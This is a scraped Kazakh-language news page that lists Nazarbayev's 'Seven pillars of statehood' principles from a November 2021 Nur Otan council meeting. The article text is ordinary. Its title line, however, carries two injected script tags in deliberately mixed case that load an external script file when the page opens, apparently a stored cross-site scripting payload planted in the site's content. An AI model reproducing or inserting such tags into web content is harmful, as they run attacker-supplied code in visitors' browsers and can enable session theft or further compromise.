«Елдіктің жеті тұғыры»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.11.2021

23 қараша Елбасы Н.Ә.Назарбаевтың «Nur Otan» партиясы Саяси кеңесінің кеңейтілген отырысы өтті. Жиында Елбасы жаңа дәуірдегі қазақстандықтарға бағдар болатын «Елдіктің жеті тұғыры» атты қағидаттар жиынтығын ұсынды.

Бірінші. Тәуелсіздік – кез-келген азамат үшін ең қастерлі құндылық.

Тамыры терең тарихымызға құрметпен қарап, мемлекеттілігімізді қадірлеу, оны көздің қарашығындай қорғау – әрбір қазақстандықтың міндеті.

Екінші. Бірлік пен келісім – елдігіміздің мызғымас тұғыры.

Этникалық әралуандық – біртұтас ұлт ретінде қалыптасқан халқымыздың артықшылығы.

Бірлігімізді арттырып, ынтымағымызды күшейтсек қана елдігіміз нығайып, егемендігіміз баянды болады.

Үшінші. Жер – ата-баба мұрасы, халық қазынасы.

Төртінші. Отбасы мен салт-дәстүр – қоғамның алтын діңгегі.

Отанға деген сүйіспеншілік – өз отбасыңа, ауыл-аймағыңа, еліңе деген махаббат пен жанашырлықтан басталады.

Отбасы – ұрпақ тәрбиесінің , қоғамдық қатынастардың бастауы саналатын бірегей институт.

Бесінші. Ұлттық мәдениет – халықтың рухани тірегі.

Біз – тамыры тереңнен бастау алатын ұлы көшпенділердің ұрпағымыз.

Болмысы ерекше, рухани-мәдени мұраларға бай халықпыз.

Алтыншы. Білім мен еңбек – байқуатты өмірдің кілті.

«Өзіңе сен, өзіңді алып шығар, еңбегің мен ақылың екі жақтап» деп дана Абай айтқандай, біз тек өз біліміміз бен күшімізге сенуіміз керек.

Жетінші. Прагматизм – бәсекеге қабілетті болудың кепілі.

Біз қолда бар ресурс пен мүмкіндікті пайдалануға, нәтижелі жұмыс атқаруға және көздеген мақсатқа тиімді қол жеткізуге тырысуымыз керек.

Елдіктің жеті тұғыры дегеніміз – осы!

                                                  

Просмотров: 511


Пікір қосу



Деректерді қолтаңбаға қосу
Текст